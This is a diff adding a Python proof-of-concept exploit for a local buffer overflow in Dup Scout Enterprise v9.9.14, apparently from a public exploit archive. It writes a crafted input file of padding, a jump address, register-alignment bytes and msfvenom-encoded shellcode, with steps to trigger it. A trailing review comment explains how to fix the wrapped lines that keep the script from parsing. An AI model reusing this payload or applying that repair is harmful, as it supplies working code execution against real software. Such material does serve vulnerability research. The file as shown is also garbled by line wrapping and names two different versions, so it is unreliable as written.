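@@ -0,0 +1,87 @@
+#!/usr/bin/python
+
+###############################################################################
+# Exploit Title : Dup Scout Enterprise v9.9.14 - 'Input Directory' Local
+Buffer Overflow
+# Date : 04 Sept, 2017
+# Exploit Author : Touhid M.Shaikh - www.touhidshaikh.com
+# Contact : https://github.com/touhidshaikh
+# Vendor Homepage: http://www.dupscout.com/
+# Version : v9.9.14
+# Software Link :
+https://www.exploit-db.com/apps/d83948ebf4c325eb8d56db6d8649d490-dupscoutent_setup_v9.9.14.exe
+# Vuln Software : Dup Scout Enterprise v9.9.1 (Evaluation)
+# Tested On : Window 7 (x86)
+################################################################################
+
+
+#========================================================================================================================#
+# TO Reproduce Attack. |
+#========================================================================================================================#
+# To trigger the exploit, click "Search" -> second (+) sign -> "Add Input
+Directory" and paste the content of Dup_Scout_buffer.txt
+#
+# Video PoC : https://www.youtube.com/watch?v=vnA0-HR7PCI
+##########################################################################################################################
+
+
+jmpebx = "\x15\x2c\x18\x65"
+
+#badchars = "\x0a\x0d\x2f"
+
+# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e
+x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
+buf = ""
+buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
+buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
+buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
+buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
+buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
+buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
+buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
+buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
+buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
+buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
+buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
+buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
+buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
+buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
+buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
+buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
+buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
+buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
+buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
+buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
+buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
+buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
+buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
+buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
+buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
+buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
+buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
+buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
+buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
+buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
+
+mixed = (
+"\x53" # push EBX
+"\x58" # pop EAX
+"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
+"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
+"\x05\x56\x56\x55\x55" # add EAX, 0x55555656
+)
+
+junk = "\x53\x5b" * 119 + "\x53"
+
+data = "A"*4096 + jmpebx + "C"*16 + jmpebx + "C"*(5296 - 4096 - 4 - 16 - 4)
++ mixed + junk + buf
+
+a = open("Dup_Scout_buffer.txt", "w")
+a.write(data)
+a.close()
+
+#Greetz : @Pulkit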
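Review bot: The file as committed does not parse: several comment lines were wrapped at about 78 columns, leaving their continuations (`Buffer Overflow`, the `https://www.exploit-db.com/apps/...` URL, `Directory" and paste the content of Dup_Scout_buffer.txt`, and `x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"`) as bare statements outside any `#` comment, so Python raises SyntaxError on the first of them before anything runs. The `data = ...` assignment is split the same way, with `+ mixed + junk + buf` standing on its own line as a separate expression rather than part of the sum; re-joining the wrapped comment lines under a leading `#` and parenthesising the right-hand side of `data` (or ending its first line with `\`) restores the file the header describes. The header is also inconsistent about the tested build: the title says `v9.9.14` while `# Vuln Software :` says `v9.9.1 (Evaluation)`, so one of the two should be corrected to make the affected version unambiguous.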